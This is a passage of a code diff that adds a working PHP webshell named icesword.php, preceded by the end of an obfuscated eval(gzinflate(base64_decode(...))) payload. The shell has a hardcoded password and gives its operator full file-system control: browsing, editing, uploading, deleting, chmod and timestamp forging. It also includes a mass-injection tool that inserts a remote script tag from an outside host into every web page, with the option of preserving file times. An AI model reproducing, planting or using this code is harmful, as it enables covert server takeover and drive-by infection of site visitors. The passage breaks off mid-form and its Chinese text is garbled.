Yvzinl0dEAc4MpHObsXOxWHQwBIFsQ3jThvnOAY+S9sfrV5YAQxbmFeNa8c/h4yZRz4MHVftTWHVXQzfdAxWKd5qgs59HRlBh2fXYDF4OF4NJtcRiDJfLAd53rybe+F+YsAXnxEH+CWym4iWbzHza3bn0AuP+S3JWu3y1b2tWou7eWUFLW5kY7Sy3Kic11uV+9LhYQPM81tuXs4ut8JnstvJNPqX4WH7fJ6IfopqeFb+hdL5GQVz8br22xDMWDGkw67fauo7HbcW/G2Tz29no+QVOyRFNAa9vgasn2dsDej8zaPNBZUo+NMML62Q9Ovorca5vR/3Ub6PfZRgjvVZNlJmFOm3ZCsFxy/+hGi4JPzxt3I+CSJlGtq0+KqAuO/wPDIUBtebHj5zjhlqJPYDwDz9nKeas0YidKT5+uPLOQF1Y08wX3pOyc1GyyWeRxHR8RKZsAXhw3kPIFiRBp8fjZPNXiyZ3iydd7YOLhs2XY6EwRKHtUal3Ko3bu+blctSo4QeV+fS1AcIU4QiTWPaRY/kyDfjQ0BwC31A/Ee8b4h6btBzPEvYeOdULv8/";
+eval(gzinflate(base64_decode($code)));
+?>div></body>
+</html>
diff --git a/php/icesword.php b/php/icesword.php
new file mode 100644
index 0000000..e5bfad5
--- /dev/null
+++ b/php/icesword.php
@@ -0,0 +1,2720 @@
+<?php
+error_reporting(E_ERROR);
+header("content-Type: text/html; charset=gb2312");
+set_time_limit(0);
+function Root_GP(&$array)
+{
+	while(list($key,$var) = each($array))
+	{
+		if((strtoupper($key) != $key || ''.intval($key) == "$key") && $key != 'argc' && $key != 'argv')
+		{
+			if(is_string($var)) $array[$key] = stripslashes($var);
+			if(is_array($var)) $array[$key] = Root_GP($var);  
+		}
+	}
+	return $array;
+}
+$password = "icesword";
+function Root_CSS()
+{
+print<<<END
+<style type="text/css">
+*{padding:0; margin:0;}
+body{background:threedface;font-family:"Verdana","Tahoma","����",sans-serif;font-size:13px;margin-top:3px;margin-bottom:3px;table-layout:fixed;word-break:break-all;}
+a{color:#000000;text-decoration:none;}
+a:hover{background:#BBBBBB;}
+table{color:#000000;font-family:"Verdana","Tahoma","����",sans-serif;font-size:13px;border:1px solid #999999;}
+td{background:#F9F6F4;}
+.toptd{background:threedface;width:310px;border-color:#FFFFFF #999999 #999999 #FFFFFF;border-style:solid;border-width:1px;}
+.msgbox{background:#FFFFE0;color:#FF0000;height:25px;font-size:12px;border:1px solid #999999;text-align:center;padding:3px;clear:both;}
+.actall{background:#F9F6F4;font-size:14px;border:1px solid #999999;padding:2px;margin-top:3px;margin-bottom:3px;clear:both;}
+</style>\n
+END;
+return false;
+}
+//�ļ�����
+class packdir
+{
+	var $out='';
+	var $datasec=array();
+	var $ctrl_dir=array();
+	var $eof_ctrl_dir="\x50\x4b\x05\x06\x00\x00\x00\x00";
+	var $old_offset=0;
+function packdir($array)
+{
+	if(@function_exists('gzcompress'))
+	{
+		for($n = 0;$n < count($array);$n++)
+		{
+			$array[$n] = urldecode($array[$n]);
+			$fp = @fopen($array[$n], 'r');
+			$filecode = @fread($fp, @filesize($array[$n]));
+			@fclose($fp);
+			$this -> filezip($filecode,basename($array[$n]));
+		}
+	@closedir($zhizhen);
+	$this->out = $this->packfile();
+	return true;
+}
+return false;
+}
+function at($atunix = 0)
+{
+	$unixarr = ($atunix == 0) ? getdate() : getdate($atunix);
+	if ($unixarr['year'] < 1980)
+	{
+		$unixarr['year']    = 1980;
+		$unixarr['mon']     = 1;
+		$unixarr['mday']    = 1;
+		$unixarr['hours']   = 0;
+		$unixarr['minutes'] = 0;
+		$unixarr['seconds'] = 0;
+	} 
+	return (($unixarr['year'] - 1980) << 25) | ($unixarr['mon'] << 21) | ($unixarr['mday'] << 16) | ($unixarr['hours'] << 11) | ($unixarr['minutes'] << 5) | ($unixarr['seconds'] >> 1);
+}
+function filezip($data, $name, $time = 0)
+{
+	$name = str_replace('\\', '/', $name);
+	$dtime = dechex($this->at($time));
+	$hexdtime	= '\x'.$dtime[6].$dtime[7].'\x'.$dtime[4].$dtime[5].'\x'.$dtime[2].$dtime[3].'\x'.$dtime[0].$dtime[1];
+	eval('$hexdtime = "' . $hexdtime . '";');
+	$fr	= "\x50\x4b\x03\x04";
+	$fr	.= "\x14\x00";
+	$fr	.= "\x00\x00";
+	$fr	.= "\x08\x00";
+	$fr	.= $hexdtime;
+	$unc_len = strlen($data);
+	$crc = crc32($data);
+	$zdata = gzcompress($data);
+	$c_len = strlen($zdata);
+	$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
+	$fr .= pack('V', $crc);
+	$fr .= pack('V', $c_len);
+	$fr .= pack('V', $unc_len);
+	$fr .= pack('v', strlen($name));
+	$fr .= pack('v', 0);
+	$fr .= $name;
+	$fr .= $zdata;
+	$fr .= pack('V', $crc);
+	$fr .= pack('V', $c_len);
+	$fr .= pack('V', $unc_len);
+	$this -> datasec[] = $fr;
+	$new_offset = strlen(implode('', $this->datasec));
+	$cdrec = "\x50\x4b\x01\x02";
+	$cdrec .= "\x00\x00";
+	$cdrec .= "\x14\x00";
+	$cdrec .= "\x00\x00";
+	$cdrec .= "\x08\x00";
+	$cdrec .= $hexdtime;
+	$cdrec .= pack('V', $crc);
+	$cdrec .= pack('V', $c_len);
+	$cdrec .= pack('V', $unc_len);
+	$cdrec .= pack('v', strlen($name) );
+	$cdrec .= pack('v', 0 );
+	$cdrec .= pack('v', 0 );
+	$cdrec .= pack('v', 0 );
+	$cdrec .= pack('v', 0 );
+	$cdrec .= pack('V', 32 );
+	$cdrec .= pack('V', $this -> old_offset );
+	$this -> old_offset = $new_offset;
+	$cdrec .= $name;
+	$this -> ctrl_dir[] = $cdrec;
+}
+function packfile()
+{
+	$data    = implode('', $this -> datasec);
+	$ctrldir = implode('', $this -> ctrl_dir);
+	return $data.$ctrldir.$this -> eof_ctrl_dir.pack('v', sizeof($this -> ctrl_dir)).pack('v', sizeof($this -> ctrl_dir)).pack('V', strlen($ctrldir)).pack('V', strlen($data))."\x00\x00";
+}
+}
+function File_Str($string)
+{
+	return str_replace('//','/',str_replace('\\','/',$string));
+}
+function File_Size($size)
+{
+	if($size > 1073741824) $size = round($size / 1073741824 * 100) / 100 . ' G';
+	elseif($size > 1048576) $size = round($size / 1048576 * 100) / 100 . ' M';
+	elseif($size > 1024) $size = round($size / 1024 * 100) / 100 . ' K';
+	else $size = $size . ' B';
+	return $size;
+}
+function File_Mode()
+{
+	$RealPath = realpath('./');
+	$SelfPath = $_SERVER['PHP_SELF'];
+	$SelfPath = substr($SelfPath, 0, strrpos($SelfPath,'/'));
+	return File_Str(substr($RealPath, 0, strlen($RealPath) - strlen($SelfPath)));
+}
+function File_Read($filename)
+{
+	$handle = @fopen($filename,"rb");
+	$filecode = @fread($handle,@filesize($filename));
+	@fclose($handle);
+	return $filecode;
+}
+function File_Write($filename,$filecode,$filemode)
+{
+	$key = true;
+	$handle = @fopen($filename,$filemode);
+	if(!@fwrite($handle,$filecode))
+	{
+	@chmod($filename,0666);
+	$key = @fwrite($handle,$filecode) ? true : false;
+	}
+@fclose($handle);
+return $key;
+}
+function File_Up($filea,$fileb)
+{
+	$key = @copy($filea,$fileb) ? true : false;
+	if(!$key) $key = @move_uploaded_file($filea,$fileb) ? true : false;
+	return $key;
+}
+function File_Down($filename)
+{
+	if(!file_exists($filename)) return false;
+	$filedown = basename($filename);
+	$array = explode('.', $filedown);
+	$arrayend = array_pop($array);
+	header('Content-type: application/x-'.$arrayend);
+	header('Content-Disposition: attachment; filename='.$filedown);
+	header('Content-Length: '.filesize($filename));
+	@readfile($filename);
+	exit;
+}
+function File_Deltree($deldir)
+{
+	if(($mydir = @opendir($deldir)) == NULL) return false;	
+	while(false !== ($file = @readdir($mydir)))
+	{
+		$name = File_Str($deldir.'/'.$file);
+		if((is_dir($name)) && ($file!='.') && ($file!='..')){@chmod($name,0777);File_Deltree($name);}
+		if(is_file($name)){@chmod($name,0777);@unlink($name);}
+	} 
+	@closedir($mydir);
+	@chmod($deldir,0777);
+	return @rmdir($deldir) ? true : false;
+}
+function File_Act($array,$actall,$inver)
+{
+	if(($count = count($array)) == 0) return '��ѡ���ļ�';
+	if($actall == 'e')
+	{
+		$zip = new packdir;
+		if($zip->packdir($array)){$spider = $zip->out;header("Content-type: application/unknown");header("Accept-Ranges: bytes");header("Content-length: ".strlen($spider));header("Content-disposition: attachment; filename=".$inver.";");echo $spider;exit;}
+		return '����ļ�ʧ��';
+	}
+	$i = 0;
+	while($i < $count)
+	{
+		$array[$i] = urldecode($array[$i]);
+		switch($actall)
+		{
+			case "a" : $inver = urldecode($inver); if(!is_dir($inver)) return '·������'; $filename = array_pop(explode('/',$array[$i])); @copy($array[$i],File_Str($inver.'/'.$filename)); $msg = '���Ƶ�'.$inver.'Ŀ¼'; break;
+			case "b" : if(!@unlink($array[$i])){@chmod($filename,0666);@unlink($array[$i]);} $msg = 'ɾ��'; break;
+			case "c" : if(!eregi("^[0-7]{4}$",$inver)) return '����ֵ����'; $newmode = base_convert($inver,8,10); @chmod($array[$i],$newmode); $msg = '�����޸�Ϊ'.$inver; break;
+			case "d" : @touch($array[$i],strtotime($inver)); $msg = '�޸�ʱ��Ϊ'.$inver; break;
+		}
+		$i++;
+	}
+	return '��ѡ�ļ�'.$msg.'���';
+}
+function File_Edit($filepath,$filename,$dim = '')
+{
+	$THIS_DIR = urlencode($filepath);
+	$THIS_FILE = File_Str($filepath.'/'.$filename);
+	if(file_exists($THIS_FILE)){$FILE_TIME = @date('Y-m-d H:i:s',filemtime($THIS_FILE));$FILE_CODE = htmlspecialchars(File_Read($THIS_FILE));}
+	else {$FILE_TIME = @date('Y-m-d H:i:s',time());$FILE_CODE = '';}
+print<<<END
+<script language="javascript">
+var NS4 = (document.layers);
+var IE4 = (document.all);
+var win = this;
+var n = 0;
+function search(str){
+	var txt, i, found;
+	if(str == "")return false;
+	if(NS4){
+		if(!win.find(str)) while(win.find(str, false, true)) n++; else n++;
+		if(n == 0) alert(str + " ... Not-Find")
+	}
+	if(IE4){
+		txt = win.document.body.createTextRange();
+		for(i = 0; i <= n && (found = txt.findText(str)) != false; i++){
+			txt.moveStart("character", 1);
+			txt.moveEnd("textedit")
+		}
+		if(found){txt.moveStart("character", -1);txt.findText(str);txt.select();txt.scrollIntoView();n++}
+		else{if (n > 0){n = 0;search(str)}else alert(str + "... Not-Find")}
+	}
+	return false
+}
+function CheckDate(){
+	var re = document.getElementById('mtime').value;
+	var reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})$/; 
+	var r = re.match(reg);
+	if(r==null){alert('���ڸ�ʽ����ȷ!��ʽ:yyyy-mm-dd hh:mm:ss');return false;}
+	else{document.getElementById('editor').submit();}
+}
+</script>
+<div class="actall">��������: <input name="searchs" type="text" value="{$dim}" style="width:500px;">
+<input type="button" value="����" onclick="search(searchs.value)"></div>
+<form method="POST" id="editor" action="?s=a&p={$THIS_DIR}">
+<div class="actall"><input type="text" name="pfn" value="{$THIS_FILE}" style="width:750px;"></div>
+<div class="actall"><textarea name="pfc" id style="width:750px;height:380px;">{$FILE_CODE}</textarea></div>
+<div class="actall">�ļ��޸�ʱ�� <input type="text" name="mtime" id="mtime" value="{$FILE_TIME}" style="width:150px;"></div>
+<div class="actall"><input type="button" value="����" onclick="CheckDate();" style="width:80px;">
+<input type="button" value="����" onclick="window.location='?s=a&p={$THIS_DIR}';" style="width:80px;"></div>
+</form>
+END;
+}
+function File_Soup($p)
+{
+	$THIS_DIR = urlencode($p);
+	$UP_SIZE = get_cfg_var('upload_max_filesize');
+	$MSG_BOX = '��������������С:'.$UP_SIZE.', ������ʽ(new.php),��Ϊ��,�򱣳�ԭ�ļ���.';
+	if(!empty($_POST['updir']))
+	{
+		if(count($_FILES['soup']) >= 1)
+		{
+			$i = 0;
+			foreach ($_FILES['soup']['error'] as $key => $error)
+			{
+				if ($error == UPLOAD_ERR_OK)
+				{
+					$souptmp = $_FILES['soup']['tmp_name'][$key];
+					if(!empty($_POST['reup'][$i]))$soupname = $_POST['reup'][$i]; else $soupname = $_FILES['soup']['name'][$key];
+					$MSG[$i] = File_Up($souptmp,File_Str($_POST['updir'].'/'.$soupname)) ? $soupname.'�ϴ��ɹ�' : $soupname.'�ϴ�ʧ��';
+				}
+				$i++;
+			}
+		}
+		else
+		{
+			$MSG_BOX = '��ѡ���ļ�';
+		}
+	}
+print<<<END
+<div class="msgbox">{$MSG_BOX}</div>
+<form method="POST" id="editor" action="?s=q&p={$THIS_DIR}" enctype="multipart/form-data">
+<div class="actall">�ϴ���Ŀ¼: <input type="text" name="updir" value="{$p}" style="width:531px;height:22px;"></div>
+<div class="actall">����1 <input type="file" name="soup[]" style="width:300px;height:22px;"> ���� <input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[0] </div>
+<div class="actall">����2 <input type="file" name="soup[]" style="width:300px;height:22px;"> ���� <input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[1] </div>
+<div class="actall">����3 <input type="file" name="soup[]" style="width:300px;height:22px;"> ���� <input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[2] </div>
+<div class="actall">����4 <input type="file" name="soup[]" style="width:300px;height:22px;"> ���� <input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[3] </div>
+<div class="actall">����5 <input type="file" name="soup[]" style="width:300px;height:22px;"> ���� <input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[4] </div>
+<div class="actall">����6 <input type="file" name="soup[]" style="width:300px;height:22px;"> ���� <input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[5] </div>
+<div class="actall">����7 <input type="file" name="soup[]" style="width:300px;height:22px;"> ���� <input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[6] </div>
+<div class="actall">����8 <input type="file" name="soup[]" style="width:300px;height:22px;"> ���� <input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[7] </div>
+<div class="actall"><input type="submit" value="�ϴ�" style="width:80px;"> <input type="button" value="����" onclick="window.location='?s=a&p={$THIS_DIR}';" style="width:80px;"></div>
+</form>
+END;
+}
+function File_a($p)
+{
+	if(!$_SERVER['SERVER_NAME']) $GETURL = ''; else $GETURL = 'http://'.$_SERVER['SERVER_NAME'].'/';
+	$MSG_BOX = '�ȴ���Ϣ����';
+	$UP_DIR = urlencode(File_Str($p.'/..'));
+	$REAL_DIR = File_Str(realpath($p));
+	$FILE_DIR = File_Str(dirname(__FILE__));
+	$ROOT_DIR = File_Mode();
+	$THIS_DIR = urlencode(File_Str($REAL_DIR));
+	$NUM_D = 0;
+	$NUM_F = 0;
+	if(!empty($_POST['pfn'])){$intime = @strtotime($_POST['mtime']);$MSG_BOX = File_Write($_POST['pfn'],$_POST['pfc'],'wb') ? '�༭�ļ� '.$_POST['pfn'].' �ɹ�' : '�༭�ļ� '.$_POST['pfn'].' ʧ��';@touch($_POST['pfn'],$intime);}
+	if(!empty($_FILES['ufp']['name'])){if($_POST['ufn'] != '') $upfilename = $_POST['ufn']; else $upfilename = $_FILES['ufp']['name'];$MSG_BOX = File_Up($_FILES['ufp']['tmp_name'],File_Str($REAL_DIR.'/'.$upfilename)) ? '�ϴ��ļ� '.$upfilename.' �ɹ�' : '�ϴ��ļ� '.$upfilename.' ʧ��';}
+	if(!empty($_POST['actall'])){$MSG_BOX = File_Act($_POST['files'],$_POST['actall'],$_POST['inver']);}
+	if(isset($_GET['md'])){$modfile = File_Str($REAL_DIR.'/'.$_GET['mk']); if(!eregi("^[0-7]{4}$",$_GET['md'])) $MSG_BOX = '����ֵ����'; else $MSG_BOX = @chmod($modfile,base_convert($_GET['md'],8,10)) ? '�޸� '.$modfile.' ����Ϊ '.$_GET['md'].' �ɹ�' : '�޸� '.$modfile.' ����Ϊ '.$_GET['md'].' ʧ��';}
+	if(isset($_GET['mn'])){$MSG_BOX = @rename(File_Str($REAL_DIR.'/'.$_GET['mn']),File_Str($REAL_DIR.'/'.$_GET['rn'])) ? '���� '.$_GET['mn'].' Ϊ '.$_GET['rn'].' �ɹ�' : '���� '.$_GET['mn'].' Ϊ '.$_GET['rn'].' ʧ��';}
+	if(isset($_GET['dn'])){$MSG_BOX = @mkdir(File_Str($REAL_DIR.'/'.$_GET['dn']),0777) ? '����Ŀ¼ '.$_GET['dn'].' �ɹ�' : '����Ŀ¼ '.$_GET['dn'].' ʧ��';}
+	if(isset($_GET['dd'])){$MSG_BOX = File_Deltree($_GET['dd']) ? 'ɾ��Ŀ¼ '.$_GET['dd'].' �ɹ�' : 'ɾ��Ŀ¼ '.$_GET['dd'].' ʧ��';}
+	if(isset($_GET['df'])){if(!File_Down($_GET['df'])) $MSG_BOX = '�����ļ�������';}
+	Root_CSS();
+print<<<END
+<script type="text/javascript">
+	function Inputok(msg,gourl)
+	{
+		smsg = "��ǰ�ļ�:[" + msg + "]";
+		re = prompt(smsg,unescape(msg));
+		if(re)
+		{
+			var url = gourl + escape(re);
+			window.location = url;
+		}
+	}
+	function Delok(msg,gourl)
+	{
+		smsg = "ȷ��Ҫɾ��[" + unescape(msg) + "]��?";
+		if(confirm(smsg))
+		{
+			if(gourl == 'b')
+			{
+				document.getElementById('actall').value = escape(gourl);
+				document.getElementById('fileall').submit();
+			}
+			else window.location = gourl;
+		}
+	}
+	function CheckDate(msg,gourl)
+	{
+		smsg = "��ǰ�ļ�ʱ��:[" + msg + "]";
+		re = prompt(smsg,msg);
+		if(re)
+		{
+			var url = gourl + re;
+			var reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})$/; 
+			var r = re.match(reg);
+			if(r==null){alert('���ڸ�ʽ����ȷ!��ʽ:yyyy-mm-dd hh:mm:ss');return false;}
+			else{document.getElementById('actall').value = gourl; document.getElementById('inver').value = re; document.getElementById('fileall').submit();}
+		}
+	}
+	function CheckAll(form)
+	{
+		for(var i=0;i<form.elements.length;i++)
+		{
+			var e = form.elements[i];
+			if (e.name != 'chkall')
+			e.checked = form.chkall.checked;
+		}
+	}
+	function SubmitUrl(msg,txt,actid)
+	{
+		re = prompt(msg,unescape(txt));
+		if(re)
+		{
+			document.getElementById('actall').value = actid;
+			document.getElementById('inver').value = escape(re);
+			document.getElementById('fileall').submit();
+		}
+	}
+</script>
+<div id="msgbox" class="msgbox">{$MSG_BOX}</div>
+<div class="actall" style="text-align:center;padding:3px;">
+<form method="GET"><input type="hidden" id="s" name="s" value="a">
+<input type="text" name="p" value="{$REAL_DIR}" style="width:550px;height:22px;">
+<select onchange="location.href='?s=a&p='+options[selectedIndex].value">
+	<option>---����Ŀ¼---</option>
+	<option value="{$ROOT_DIR}">��վ��Ŀ¼</option>
+	<option value="{$FILE_DIR}">������Ŀ¼</option>
+	<option value="C:/">C��</option>
+	<option value="D:/">D��</option>
+	<option value="E:/">E��</option>
+	<option value="F:/">F��</option>
+	<option value="C:/Documents and Settings/All Users/����ʼ���˵�/����/����">������</option>
+	<option value="C:/Documents and Settings/All Users/Start Menu/Programs/Startup">������(Ӣ)</option>
+	<option value="C:/RECYCLER">����վ</option>
+	<option value="C:/Program Files">Programs</option>
+	<option value="/etc">etc</option>
+	<option value="/home">home</option>
+	<option value="/usr/local">Local</option>
+	<option value="/tmp">Temp</option>
+</select><input type="submit" value="ת��" style="width:50px;"></form>
+<div style="margin-top:3px;"></div>
+<form method="POST" action="?s=a&p={$THIS_DIR}" enctype="multipart/form-data">
+	<input type="button" value="�½��ļ�" onclick="Inputok('newfile.php','?s=p&fp={$THIS_DIR}&fn=');">
+	<input type="button" value="�½�Ŀ¼" onclick="Inputok('newdir','?s=a&p={$THIS_DIR}&dn=');"> 
+	<input type="button" value="�����ϴ�" onclick="window.location='?s=q&p={$REAL_DIR}';"> 
+	<input type="file" name="ufp" style="width:300px;height:22px;">
+	<input type="text" name="ufn" style="width:121px;height:22px;">
+	<input type="submit" value="�ϴ�" style="width:50px;">
+</form></div>
+<form method="POST" name="fileall" id="fileall" action="?s=a&p={$THIS_DIR}">
+<table border="0"><tr><td class="toptd" style="width:450px;"> <a href="?s=a&p={$UP_DIR}"><b>�ϼ�Ŀ¼</b></a></td>
+<td class="toptd" style="width:80px;"> ���� </td><td class="toptd" style="width:48px;"> ���� </td><td class="toptd" style="width:173px;"> �޸�ʱ�� </td><td class="toptd" style="width:75px;"> ��С </td></tr>
+END;
+	if(($h_d = @opendir($p)) == NULL) return false;
+	while(false !== ($Filename = @readdir($h_d)))
+	{
+		if($Filename == '.' or $Filename == '..') continue;
+		$Filepath = File_Str($REAL_DIR.'/'.$Filename);
+		if(is_dir($Filepath))
+		{
+			$Fileperm = substr(base_convert(@fileperms($Filepath),10,8),-4);
+			$Filetime = @date('Y-m-d H:i:s',@filemtime($Filepath));
+			$Filepath = urlencode($Filepath);
+			echo "\r\n".' <tr><td> <a href="?s=a&p='.$Filepath.'"><font face="wingdings" size="3">0</font><b> '.$Filename.' </b></a> </td> ';
+			$Filename = urlencode($Filename);
+			echo ' <td> <a href="#" onclick="Delok(\''.$Filename.'\',\'?s=a&p='.$THIS_DIR.'&dd='.$Filename.'\');return false;"> ɾ�� </a> ';
+			echo ' <a href="#" onclick="Inputok(\''.$Filename.'\',\'?s=a&p='.$THIS_DIR.'&mn='.$Filename.'&rn=\');return false;"> ���� </a> </td> ';
+			echo ' <td> <a href="#" onclick="Inputok(\''.$Fileperm.'\',\'?s=a&p='.$THIS_DIR.'&mk='.$Filename.'&md=\');return false;"> '.$Fileperm.' </a> </td> ';
+			echo ' <td>'.$Filetime.'</td> ';
+			echo ' <td> </td> </tr>'."\r\n";
+			$NUM_D++;
+		}
+	}
+	@rewinddir($h_d);
+	while(false !== ($Filename = @readdir($h_d)))
+	{
+		if($Filename == '.' or $Filename == '..') continue;
+		$Filepath = File_Str($REAL_DIR.'/'.$Filename);
+		if(!is_dir($Filepath))
+		{
+			$Fileurls = str_replace(File_Str($ROOT_DIR.'/'),$GETURL,$Filepath);
+			$Fileperm = substr(base_convert(@fileperms($Filepath),10,8),-4);
+			$Filetime = @date('Y-m-d H:i:s',@filemtime($Filepath));
+			$Filesize = File_Size(@filesize($Filepath));
+			if($Filepath == File_Str(__FILE__)) $fname = '<font color="#8B0000">'.$Filename.'</font>'; else $fname = $Filename;
+			echo "\r\n".' <tr><td> <input type="checkbox" name="files[]" value="'.urlencode($Filepath).'"><a target="_blank" href="'.$Fileurls.'">'.$fname.'</a> </td>';
+			$Filepath = urlencode($Filepath);
+			$Filename = urlencode($Filename);
+			echo ' <td> <a href="?s=p&fp='.$THIS_DIR.'&fn='.$Filename.'"> �༭ </a> ';
+			echo ' <a href="#" onclick="Inputok(\''.$Filename.'\',\'?s=a&p='.$THIS_DIR.'&mn='.$Filename.'&rn=\');return false;"> ���� </a> </td>';
+			echo ' <td>'.$Fileperm.'</td> ';
+			echo ' <td>'.$Filetime.'</td> ';
+			echo ' <td align="right"> <a href="?s=a&df='.$Filepath.'">'.$Filesize.'</a> </td></tr> '."\r\n";
+			$NUM_F++;
+		}
+	}
+	@closedir($h_d);
+	if(!$Filetime) $Filetime = '2009-01-01 00:00:00';
+print<<<END
+</table>
+<div class="actall"> <input type="hidden" id="actall" name="actall" value="undefined"> 
+<input type="hidden" id="inver" name="inver" value="undefined"> 
+<input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form);"> 
+<input type="button" value="����" onclick="SubmitUrl('������ѡ�ļ���·��: ','{$THIS_DIR}','a');return false;"> 
+<input type="button" value="ɾ��" onclick="Delok('��ѡ�ļ�','b');return false;"> 
+<input type="button" value="����" onclick="SubmitUrl('�޸���ѡ�ļ�����ֵΪ: ','0666','c');return false;"> 
+<input type="button" value="ʱ��" onclick="CheckDate('{$Filetime}','d');return false;"> 
+<input type="button" value="���" onclick="SubmitUrl('�����������ѡ�ļ�������Ϊ: ','silic.gz','e');return false;"> 
+Ŀ¼({$NUM_D}) / �ļ�({$NUM_F})</div> 
+</form> 
+END;
+	return true;
+}
+//��������
+function Guama_Pass($length)
+{
+	$possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
+	$str = "";
+	while(strlen($str) < $length) $str .= substr($possible,(rand() % strlen($possible)),1);
+	return $str;
+}
+function Guama_Make($codea,$codeb,$codec)
+{
+	return str_replace($codea,Guama_Pass($codeb),$codec);
+}
+function Guama_Auto($gp,$gt,$gl,$gc,$gm,$gf,$gi,$gk,$gd,$gb)
+{
+	if(($h_d = @opendir($gp)) == NULL) return false;
+	if($gm > 12) return false;
+	while(false !== ($Filename = @readdir($h_d)))
+	{
+		if($Filename == '.' || $Filename == '..') continue;
+		if($gl != ''){if(eregi($gl,$Filename)) continue;}
+		$Filepath = File_Str($gp.'/'.$Filename);
+		if(is_dir($Filepath) && $gb) Guama_Auto($Filepath,$gt,$gl,$gc,$gm,$gf,$gi,$gk,$gd,$gb);
+		if(eregi($gt,$Filename))
+		{
+			$fc = File_Read($Filepath);
+			if(($gk != '') && (stristr($fc,chop($gk)))) continue;
+			if(($gf != '') && ($gm != 0)) $gcm = Guama_Make($gf,$gm,$gc); else $gcm = $gc;
+			if($gd) $ftime = @filemtime($Filepath);
+			if($gi == 'a'){if(!stristr($fc,'</head>')) continue; $fcm = str_replace('</head>',"\r\n".$gcm."\r\n".'</head>',$fc); $fcm = str_replace('</HEAD>',"\r\n".$gcm."\r\n".'</HEAD>',$fcm);}
+			if($gi == 'b') $fcm = $gcm."\r\n".$fc;
+			if($gi == 'c') $fcm = $fc."\r\n".$gcm;
+			echo File_Write($Filepath,$fcm,'wb') ? '<font color="#006600">�ɹ�:</font>'.$Filepath.' <br>'."\r\n" : '<font color="#FF0000">ʧ��:</font>'.$Filepath.' <br>'."\r\n";
+			if($gd) @touch($Filepath,$ftime);
+			ob_flush();
+			flush();
+		}
+	}
+	@closedir($h_d);
+	return true;
+}
+function Guama_b()
+{
+	if((!empty($_POST['gp'])) && (!empty($_POST['gt'])) && (!empty($_POST['gc'])))
+	{
+		echo '<div class="actall">';
+		$_POST['gt'] = str_replace('.','\\.',$_POST['gt']);
+		if($_POST['inout'] == 'a') $_POST['gl'] = str_replace('.','\\.',$_POST['gl']); else $_POST['gl'] = '';
+		if(stristr($_POST['gc'],'[-') && stristr($_POST['gc'],'-]'))
+		{
+			$temp = explode('[-',$_POST['gc']);
+			$gk = $temp[0];
+			preg_match_all("/\[\-([^~]*?)\-\]/i",$_POST['gc'],$nc);
+			if(!eregi("^[0-9]{1,2}$",$nc[1][0])){echo '<a href="#" onclick="history.back();">�쳣��ֹ</a>'; return false;}
+			$gm = (int)$nc[1][0];
+			$gf = $nc[0][0];
+		}
+		else
+		{
+			$gk = $_POST['gc'];
+			$gm = 0;
+			$gf = '';
+		}
+		if(!isset($_POST['gx'])) $gk = '';
+		$gd = isset($_POST['gd']) ? true : false;
+		$gb = ($_POST['gb'] == 'a') ? true : false;
+		echo Guama_Auto($_POST['gp'],$_POST['gt'],$_POST['gl'],$_POST['gc'],$gm,$gf,$_POST['gi'],$gk,$gd,$gb) ? '<a href="#" onclick="history.back();">���</a>' : '<a href="#" onclick="history.back();">�쳣��ֹ</a>';
+		echo '</div>';
+		return false;
+	}
+	$FILE_DIR = File_Str(dirname(__FILE__));
+	$ROOT_DIR = File_Mode();
+print<<<END
+<script language="javascript">
+function Fulll(i)
+{
+	if(i==0) return false;
+  Str = new Array(5);
+  if(i <= 2){Str[1] = "{$ROOT_DIR}";Str[2] = "{$FILE_DIR}";sform.gp.value = Str[i];}
+  else{Str[3] = ".htm|.html|.shtml";Str[4] = ".htm|.html|.shtml|.asp|.php|.cgi|.aspx";Str[5] = ".js";sform.gt.value = Str[i];}
+  return true;
+}
+function autorun()
+{
+	if(document.getElementById('gp').value == ''){alert('·������Ϊ��');return false;}
+	if(document.getElementById('gt').value == ''){alert('���Ͳ���Ϊ��');return false;}
+	if(document.getElementById('gc').value == ''){alert('���벻��Ϊ��');return false;}
+	document.getElementById('sform').submit();
+}
+</script>
+<form method="POST" name="sform" id="sform" action="?s=b">
+<div class="actall" style="height:35px;">����·��<input type="text" name="gp" id="gp" value="{$ROOT_DIR}" style="width:500px;">
+<select onchange='return Fulll(options[selectedIndex].value)'>
+<option value="0" selected>--��Χѡ��--</option>
+<option value="1">��վ��Ŀ¼</option>
+<option value="2">������Ŀ¼</option>
+</select></div>
+<div class="actall" style="height:35px;">�ļ����� <input type="text" name="gt" id="gt" value=".htm|.html|.shtml|.php|.asp|.aspx" style="width:500px;">
+<select onchange='return Fulll(options[selectedIndex].value)'>
+<option value="0" selected>--����ѡ��--</option>
+<option value="3">��̬�ļ�</option>
+<option value="4">�ű���̬</option>
+<option value="5">JS�ļ�</option>
+</select></div>
+<div class="actall" style="height:35px;">���˶��� <input type="text" name="gl" value="templet|templets|default|editor" style="width:500px;" disabled>
+<input type="radio" name="inout" value="a" onclick="gl.disabled=false;">���� <input type="radio" name="inout" value="b" onclick="gl.disabled=true;" checked>�ر�</div>
+<div class="actall">�������� <textarea name="gc" id="gc" style="width:610px;height:180px;">&lt;script language=javascript src="http://blackbap.org/ad.js?[-6-]"&gt;&lt;/script&gt;</textarea>
+<div class="msgbox">����˵��: �����Զ�Ѱ��[-6-]��ǩ,�滻Ϊ����ַ�,6��ʾ��λ����ַ�,���12λ,��������ο��Բ���[-6-]��ǩ.
+<br>ʾ��: &lt;script language=javascript src="http://blackbap.org/ad.js?EMTDSU"&gt;&lt;/script&gt;</div></div>
+<div class="actall" style="height:35px;"><input type="radio" name="gi" value="a" checked>����&lt;/head&gt;��ǩ֮ǰ 
